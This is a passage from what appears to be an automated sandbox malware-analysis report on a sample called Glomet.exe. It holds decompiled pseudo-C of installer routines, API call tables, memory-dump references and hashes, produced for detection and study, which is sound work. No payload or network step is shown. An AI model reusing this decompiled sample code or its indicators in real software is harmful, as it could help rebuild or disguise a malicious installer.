                                                                                                                                                                              									goto L36;
                                                                                                                                                                              								}
                                                                                                                                                                              							} else {
                                                                                                                                                                              								_t159 = 0;
                                                                                                                                                                              								if(0 == 0x429860) {
                                                                                                                                                                              									goto L30;
                                                                                                                                                                              								} else {
                                                                                                                                                                              									goto L26;
                                                                                                                                                                              								}
                                                                                                                                                                              								while(1) {
                                                                                                                                                                              									L26:
                                                                                                                                                                              									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                                                                                                                                                                              									if(_t114 != 0) {
                                                                                                                                                                              										break;
                                                                                                                                                                              									}
                                                                                                                                                                              									if(_t159 != 0) {
                                                                                                                                                                              										 *_t159 =  *_t159 & _t114;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t160 = E00405C30(0x429860);
                                                                                                                                                                              									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                                                                              									_t159 = _t160 - 1;
                                                                                                                                                                              									 *_t159 = 0x5c;
                                                                                                                                                                              									if(_t159 != 0x429860) {
                                                                                                                                                                              										continue;
                                                                                                                                                                              									} else {
                                                                                                                                                                              										goto L30;
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								_t150 = _v44;
                                                                                                                                                                              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                                                                              								_v44 = _t150 >> 0xa;
                                                                                                                                                                              								_v12 = 1;
                                                                                                                                                                              								_t158 = 0;
                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                              								L35:
                                                                                                                                                                              								_t168 = 0x400;
                                                                                                                                                                              								L36:
                                                                                                                                                                              								_t95 = E00404BFA(5);
                                                                                                                                                                              								if(_v12 != _t158) {
                                                                                                                                                                              									_t197 = _v44;
                                                                                                                                                                              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                                                                              										_v8 = 2;
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								_t147 =  *0x42ebfc; // 0x5a1993
                                                                                                                                                                              								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                                                                              									E00404BE2(0x3ff, 0xfffffffb, _t95);
                                                                                                                                                                              									if(_v12 == _t158) {
                                                                                                                                                                              										SetDlgItemTextA(_a4, _t168, 0x429850);
                                                                                                                                                                              									} else {
                                                                                                                                                                              										E00404B1D(_t168, 0xfffffffc, _v48, _v44);
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								_t96 = _v8;
                                                                                                                                                                              								 *0x42f4c4 = _t96;
                                                                                                                                                                              								if(_t96 == _t158) {
                                                                                                                                                                              									_v8 = E0040140B(7);
                                                                                                                                                                              								}
                                                                                                                                                                              								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                                                                                              									_v8 = _t158;
                                                                                                                                                                              								}
                                                                                                                                                                              								E004042F6(0 | _v8 == _t158);
                                                                                                                                                                              								if(_v8 == _t158) {
                                                                                                                                                                              									_t205 =  *0x42a880 - _t158; // 0x0
                                                                                                                                                                              									if(_t205 == 0) {
                                                                                                                                                                              										E004046BF();
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								 *0x42a880 = _t158;
                                                                                                                                                                              								goto L53;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						_t185 = _a8 - 0x405;
                                                                                                                                                                              						if(_a8 != 0x405) {
                                                                                                                                                                              							goto L53;
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L22;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t118 = _a12 & 0x0000ffff;
                                                                                                                                                                              					if(_t118 != 0x3fb) {
                                                                                                                                                                              						L12:
                                                                                                                                                                              						if(_t118 == 0x3e9) {
                                                                                                                                                                              							_t152 = 7;
                                                                                                                                                                              							memset( &_v76, 0, _t152 << 2);
                                                                                                                                                                              							_v80 = _t166;
                                                                                                                                                                              							_v72 = 0x42a890;
                                                                                                                                                                              							_v60 = E00404AB7;
                                                                                                                                                                              							_v56 = _t146;
                                                                                                                                                                              							_v68 = E004062EA(_t146, 0x42a890, _t166, 0x429c68, _v12);
                                                                                                                                                                              							_t122 =  &_v80;
                                                                                                                                                                              							_v64 = 0x41;
                                                                                                                                                                              							__imp__SHBrowseForFolderA(_t122);
                                                                                                                                                                              							if(_t122 == 0) {
                                                                                                                                                                              								_a8 = 0x40f;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								__imp__CoTaskMemFree(_t122);
                                                                                                                                                                              								E00405BE9(_t146);
                                                                                                                                                                              								_t125 =  *((intOrPtr*)( *0x42f430 + 0x11c));
                                                                                                                                                                              								if( *((intOrPtr*)( *0x42f430 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens") {
                                                                                                                                                                              									E004062EA(_t146, 0x42a890, _t166, 0, _t125);
                                                                                                                                                                              									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                                                                                                                                                                              										lstrcatA(_t146, 0x42e3c0);
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								 *0x42a880 =  *0x42a880 + 1;
                                                                                                                                                                              								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L20;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                                              						goto L53;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_a8 = 0x40f;
                                                                                                                                                                              						goto L12;
                                                                                                                                                                              					}
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                                                                                              					if(E00405C56(_t146) != 0 && E00405C82(_t146) == 0) {
                                                                                                                                                                              						E00405BE9(_t146);
                                                                                                                                                                              					}
                                                                                                                                                                              					 *0x42ebf8 = _t166;
                                                                                                                                                                              					SetWindowTextA(_t165, _t146);
                                                                                                                                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                                              					_push(1);
                                                                                                                                                                              					E004042D4(_t166);
                                                                                                                                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                              					_push(0x14);
                                                                                                                                                                              					E004042D4(_t166);
                                                                                                                                                                              					E00404309(_t165);
                                                                                                                                                                              					_t138 = E00406663(8);
                                                                                                                                                                              					if(_t138 == 0) {
                                                                                                                                                                              						L53:
                                                                                                                                                                              						return E0040433B(_a8, _a12, _a16);
                                                                                                                                                                              					} else {
                                                                                                                                                                              						 *_t138(_t165, 1);
                                                                                                                                                                              						goto L8;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              			}















































                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404980
                                                                                                                                                                              0x004049dd
                                                                                                                                                                              0x004049e7
                                                                                                                                                                              0x004049ea
                                                                                                                                                                              0x004049ed
                                                                                                                                                                              0x004049f4
                                                                                                                                                                              0x004049f4
                                                                                                                                                                              0x004049f6
                                                                                                                                                                              0x004049f6
                                                                                                                                                                              0x004049fb
                                                                                                                                                                              0x004049fd
                                                                                                                                                                              0x00404a05
                                                                                                                                                                              0x00404a0c
                                                                                                                                                                              0x00404a0e
                                                                                                                                                                              0x00404a19
                                                                                                                                                                              0x00404a19
                                                                                                                                                                              0x00404a0e
                                                                                                                                                                              0x00404a20
                                                                                                                                                                              0x00404a29
                                                                                                                                                                              0x00404a33
                                                                                                                                                                              0x00404a3b
                                                                                                                                                                              0x00404a56
                                                                                                                                                                              0x00404a3d
                                                                                                                                                                              0x00404a46
                                                                                                                                                                              0x00404a46
                                                                                                                                                                              0x00404a3b
                                                                                                                                                                              0x00404a5b
                                                                                                                                                                              0x00404a60
                                                                                                                                                                              0x00404a65
                                                                                                                                                                              0x00404a6e
                                                                                                                                                                              0x00404a6e
                                                                                                                                                                              0x00404a77
                                                                                                                                                                              0x00404a79
                                                                                                                                                                              0x00404a79
                                                                                                                                                                              0x00404a85
                                                                                                                                                                              0x00404a8d
                                                                                                                                                                              0x00404a8f
                                                                                                                                                                              0x00404a95
                                                                                                                                                                              0x00404a97
                                                                                                                                                                              0x00404a97
                                                                                                                                                                              0x00404a95
                                                                                                                                                                              0x00404a9c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404a9c
                                                                                                                                                                              0x0040494b
                                                                                                                                                                              0x00404902
                                                                                                                                                                              0x00404909
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404909
                                                                                                                                                                              0x00404828
                                                                                                                                                                              0x00404831
                                                                                                                                                                              0x0040484b
                                                                                                                                                                              0x00404850
                                                                                                                                                                              0x0040485a
                                                                                                                                                                              0x00404861
                                                                                                                                                                              0x0040486d
                                                                                                                                                                              0x00404870
                                                                                                                                                                              0x00404873
                                                                                                                                                                              0x0040487a
                                                                                                                                                                              0x00404882
                                                                                                                                                                              0x00404885
                                                                                                                                                                              0x00404889
                                                                                                                                                                              0x00404890
                                                                                                                                                                              0x00404898
                                                                                                                                                                              0x004048f2
                                                                                                                                                                              0x0040489a
                                                                                                                                                                              0x0040489b
                                                                                                                                                                              0x004048a2
                                                                                                                                                                              0x004048ac
                                                                                                                                                                              0x004048b4
                                                                                                                                                                              0x004048c1
                                                                                                                                                                              0x004048d5
                                                                                                                                                                              0x004048d9
                                                                                                                                                                              0x004048d9
                                                                                                                                                                              0x004048d5
                                                                                                                                                                              0x004048de
                                                                                                                                                                              0x004048eb
                                                                                                                                                                              0x004048eb
                                                                                                                                                                              0x00404898
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404850
                                                                                                                                                                              0x0040483e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404844
                                                                                                                                                                              0x00404844
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404844
                                                                                                                                                                              0x004047af
                                                                                                                                                                              0x004047bc
                                                                                                                                                                              0x004047c5
                                                                                                                                                                              0x004047d2
                                                                                                                                                                              0x004047d2
                                                                                                                                                                              0x004047d9
                                                                                                                                                                              0x004047df
                                                                                                                                                                              0x004047e8
                                                                                                                                                                              0x004047eb
                                                                                                                                                                              0x004047ee
                                                                                                                                                                              0x004047f6
                                                                                                                                                                              0x004047f9
                                                                                                                                                                              0x004047fc
                                                                                                                                                                              0x00404802
                                                                                                                                                                              0x00404809
                                                                                                                                                                              0x00404810
                                                                                                                                                                              0x00404aa2
                                                                                                                                                                              0x00404ab4
                                                                                                                                                                              0x00404816
                                                                                                                                                                              0x00404819
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404819
                                                                                                                                                                              0x00404810

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004047B5
                                                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404890
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                                                                                                                                              • lstrcmpiA.KERNEL32(ExecToStack,ARBEJDSTILLADELSER Setup: Installing,00000000,?,?), ref: 004048CD
                                                                                                                                                                              • lstrcatA.KERNEL32(?,ExecToStack), ref: 004048D9
                                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 004048EB
                                                                                                                                                                                • Part of subcall function 00405951: GetDlgItemTextA.USER32 ref: 00405964
                                                                                                                                                                                • Part of subcall function 00406535: CharNextA.USER32(0000000B,*?|<>/":,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                                                                                                                • Part of subcall function 00406535: CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                                                                                                                                • Part of subcall function 00406535: CharNextA.USER32(0000000B,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                                                                                                                                • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 004049A9
                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C4
                                                                                                                                                                                • Part of subcall function 00404B1D: lstrlenA.KERNEL32(ARBEJDSTILLADELSER Setup: Installing,ARBEJDSTILLADELSER Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                                                                                                                                • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                                                                                                                                                • Part of subcall function 00404B1D: SetDlgItemTextA.USER32 ref: 00404BD6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                              • String ID: A$ARBEJDSTILLADELSER Setup: Installing$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens$ExecToStack
                                                                                                                                                                              • API String ID: 2624150263-4159307710
                                                                                                                                                                              • Opcode ID: 77a47a1ab08589053cc7753b654a21a624dca3a385ae25c0a950fb0e42879f7b
                                                                                                                                                                              • Instruction ID: 575699f201696e67f0f9c35a0e1f8108b56c42fe30a04e4012ee5e208413707b
                                                                                                                                                                              • Opcode Fuzzy Hash: 77a47a1ab08589053cc7753b654a21a624dca3a385ae25c0a950fb0e42879f7b
                                                                                                                                                                              • Instruction Fuzzy Hash: 89A18FB1A00209ABDB11AFA6CD41AAF77B8AF84314F14843BF601B62D1D77C99518F6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                                              			E004027AA(char __ebx, char* __edi, char* __esi) {
                                                                                                                                                                              				void* _t19;
                                                                                                                                                                              
                                                                                                                                                                              				if(FindFirstFileA(E00402C39(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                                                                                                              					E004061B5(__edi, _t6);
                                                                                                                                                                              					_push(_t19 - 0x1a4);
                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                              					E00406257();
                                                                                                                                                                              				} else {
                                                                                                                                                                              					 *__edi = __ebx;
                                                                                                                                                                              					 *__esi = __ebx;
                                                                                                                                                                              					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}





                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                              • Opcode ID: 416b82a8e7ce6a9283ba158689e0c1d29776a88bfb89b879210539ae0270608b
                                                                                                                                                                              • Instruction ID: b48363985cd602751ae38a2791165fd5af0714f22da7c63f7ced5d0d9316473d
                                                                                                                                                                              • Opcode Fuzzy Hash: 416b82a8e7ce6a9283ba158689e0c1d29776a88bfb89b879210539ae0270608b
                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF0A072608144AAD710EBA49A49AEEB7689F51324F60447BF142B20C1D6B849459B3A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                              			E00406AA8(signed int __ebx, signed int* __esi) {
                                                                                                                                                                              				signed int _t396;
                                                                                                                                                                              				signed int _t425;
                                                                                                                                                                              				signed int _t442;
                                                                                                                                                                              				signed int _t443;
                                                                                                                                                                              				signed int* _t446;
                                                                                                                                                                              				void* _t448;
                                                                                                                                                                              
                                                                                                                                                                              				L0:
                                                                                                                                                                              				while(1) {
                                                                                                                                                                              					L0:
                                                                                                                                                                              					_t446 = __esi;
                                                                                                                                                                              					_t425 = __ebx;
                                                                                                                                                                              					if( *(_t448 - 0x34) == 0) {
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					L55:
                                                                                                                                                                              					__eax =  *(__ebp - 0x38);
                                                                                                                                                                              					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              					__ecx = __ebx;
                                                                                                                                                                              					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              					__ebx = __ebx + 8;
                                                                                                                                                                              					while(1) {
                                                                                                                                                                              						L56:
                                                                                                                                                                              						if(__ebx < 0xe) {
                                                                                                                                                                              							goto L0;
                                                                                                                                                                              						}
                                                                                                                                                                              						L57:
                                                                                                                                                                              						__eax =  *(__ebp - 0x40);
                                                                                                                                                                              						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                                                                                              						__ecx = __eax;
                                                                                                                                                                              						__esi[1] = __eax;
                                                                                                                                                                              						__ecx = __eax & 0x0000001f;
                                                                                                                                                                              						if(__cl > 0x1d) {
                                                                                                                                                                              							L9:
                                                                                                                                                                              							_t443 = _t442 | 0xffffffff;
                                                                                                                                                                              							 *_t446 = 0x11;
                                                                                                                                                                              							L10:
                                                                                                                                                                              							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                                                                              							_t446[0x146] = _t425;
                                                                                                                                                                              							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                                                                                              							L11:
                                                                                                                                                                              							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                                                                                              							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                                                                                              							E00407217( *(_t448 + 8));
                                                                                                                                                                              							return _t443;
                                                                                                                                                                              						}
                                                                                                                                                                              						L58:
                                                                                                                                                                              						__eax = __eax & 0x000003e0;
                                                                                                                                                                              						if(__eax > 0x3a0) {
                                                                                                                                                                              							goto L9;
                                                                                                                                                                              						}
                                                                                                                                                                              						L59:
                                                                                                                                                                              						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                                                                                              						__ebx = __ebx - 0xe;
                                                                                                                                                                              						_t94 =  &(__esi[2]);
                                                                                                                                                                              						 *_t94 = __esi[2] & 0x00000000;
                                                                                                                                                                              						 *__esi = 0xc;
                                                                                                                                                                              						while(1) {
                                                                                                                                                                              							L60:
                                                                                                                                                                              							__esi[1] = __esi[1] >> 0xa;
                                                                                                                                                                              							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                                                                              							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                                                                              								goto L68;
                                                                                                                                                                              							}
                                                                                                                                                                              							L61:
                                                                                                                                                                              							while(1) {
                                                                                                                                                                              								L64:
                                                                                                                                                                              								if(__ebx >= 3) {
                                                                                                                                                                              									break;
                                                                                                                                                                              								}
                                                                                                                                                                              								L62:
                                                                                                                                                                              								if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              									goto L182;
                                                                                                                                                                              								}
                                                                                                                                                                              								L63:
                                                                                                                                                                              								__eax =  *(__ebp - 0x38);
                                                                                                                                                                              								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              								__ecx = __ebx;
                                                                                                                                                                              								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              								__ebx = __ebx + 8;
                                                                                                                                                                              							}
                                                                                                                                                                              							L65:
                                                                                                                                                                              							__ecx = __esi[2];
                                                                                                                                                                              							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                                                                              							__ebx = __ebx - 3;
                                                                                                                                                                              							_t108 = __ecx + 0x408408; // 0x121110
                                                                                                                                                                              							__ecx =  *_t108;
                                                                                                                                                                              							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                                                                                              							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                                                                              							__ecx = __esi[1];
                                                                                                                                                                              							__esi[2] = __esi[2] + 1;
                                                                                                                                                                              							__eax = __esi[2];
                                                                                                                                                                              							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                                                                                              							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                                                                                              								goto L64;
                                                                                                                                                                              							}
                                                                                                                                                                              							L66:
                                                                                                                                                                              							while(1) {
                                                                                                                                                                              								L68:
                                                                                                                                                                              								if(__esi[2] >= 0x13) {
                                                                                                                                                                              									break;
                                                                                                                                                                              								}
                                                                                                                                                                              								L67:
                                                                                                                                                                              								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                                                                                                                              								__eax =  *_t119;
                                                                                                                                                                              								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                                                                                              								_t126 =  &(__esi[2]);
                                                                                                                                                                              								 *_t126 = __esi[2] + 1;
                                                                                                                                                                              							}
                                                                                                                                                                              							L69:
                                                                                                                                                                              							__ecx = __ebp - 8;
                                                                                                                                                                              							__edi =  &(__esi[0x143]);
                                                                                                                                                                              							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                                                                                              							__eax = 0;
                                                                                                                                                                              							 *(__ebp - 8) = 0;
                                                                                                                                                                              							__eax =  &(__esi[3]);
                                                                                                                                                                              							 *__edi = 7;
                                                                                                                                                                              							__eax = E0040727F( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                                                                                              							if(__eax != 0) {
                                                                                                                                                                              								L72:
                                                                                                                                                                              								 *__esi = 0x11;
                                                                                                                                                                              								while(1) {
                                                                                                                                                                              									L180:
                                                                                                                                                                              									_t396 =  *_t446;
                                                                                                                                                                              									if(_t396 > 0xf) {
                                                                                                                                                                              										break;
                                                                                                                                                                              									}
                                                                                                                                                                              									L1:
                                                                                                                                                                              									switch( *((intOrPtr*)(_t396 * 4 +  &M004071D7))) {
                                                                                                                                                                              										case 0:
                                                                                                                                                                              											L101:
                                                                                                                                                                              											__eax = __esi[4] & 0x000000ff;
                                                                                                                                                                              											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                                                                              											__eax = __esi[5];
                                                                                                                                                                              											__esi[2] = __esi[5];
                                                                                                                                                                              											 *__esi = 1;
                                                                                                                                                                              											goto L102;
                                                                                                                                                                              										case 1:
                                                                                                                                                                              											L102:
                                                                                                                                                                              											__eax = __esi[3];
                                                                                                                                                                              											while(1) {
                                                                                                                                                                              												L105:
                                                                                                                                                                              												__eflags = __ebx - __eax;
                                                                                                                                                                              												if(__ebx >= __eax) {
                                                                                                                                                                              													break;
                                                                                                                                                                              												}
                                                                                                                                                                              												L103:
                                                                                                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                              													goto L182;
                                                                                                                                                                              												}
                                                                                                                                                                              												L104:
                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                              												__ebx = __ebx + 8;
                                                                                                                                                                              												__eflags = __ebx;
                                                                                                                                                                              											}
                                                                                                                                                                              											L106:
                                                                                                                                                                              											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                                                                                                                              											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                                                              											__ecx = __esi[2];
                                                                                                                                                                              											__eax = __esi[2] + __eax * 4;
                                                                                                                                                                              											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                                                                              											__ecx =  *__eax & 0x000000ff;
                                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                                              											if(__ecx != 0) {
                                                                                                                                                                              												L108:
                                                                                                                                                                              												__eflags = __cl & 0x00000010;
                                                                                                                                                                              												if((__cl & 0x00000010) == 0) {
                                                                                                                                                                              													L110:
                                                                                                                                                                              													__eflags = __cl & 0x00000040;
                                                                                                                                                                              													if((__cl & 0x00000040) == 0) {
                                                                                                                                                                              														goto L125;
                                                                                                                                                                              													}
                                                                                                                                                                              													L111:
                                                                                                                                                                              													__eflags = __cl & 0x00000020;
                                                                                                                                                                              													if((__cl & 0x00000020) == 0) {
                                                                                                                                                                              														goto L9;
                                                                                                                                                                              													}
                                                                                                                                                                              													L112:
                                                                                                                                                                              													 *__esi = 7;
                                                                                                                                                                              													goto L180;
                                                                                                                                                                              												}
                                                                                                                                                                              												L109:
                                                                                                                                                                              												__esi[2] = __ecx;
                                                                                                                                                                              												__esi[1] = __eax;
                                                                                                                                                                              												 *__esi = 2;
                                                                                                                                                                              												goto L180;
                                                                                                                                                                              											}
                                                                                                                                                                              											L107:
                                                                                                                                                                              											__esi[2] = __eax;
                                                                                                                                                                              											 *__esi = 6;
                                                                                                                                                                              											goto L180;
                                                                                                                                                                              										case 2:
                                                                                                                                                                              											L113:
                                                                                                                                                                              											__eax = __esi[2];
                                                                                                                                                                              											while(1) {
                                                                                                                                                                              												L116:
                                                                                                                                                                              												__eflags = __ebx - __eax;
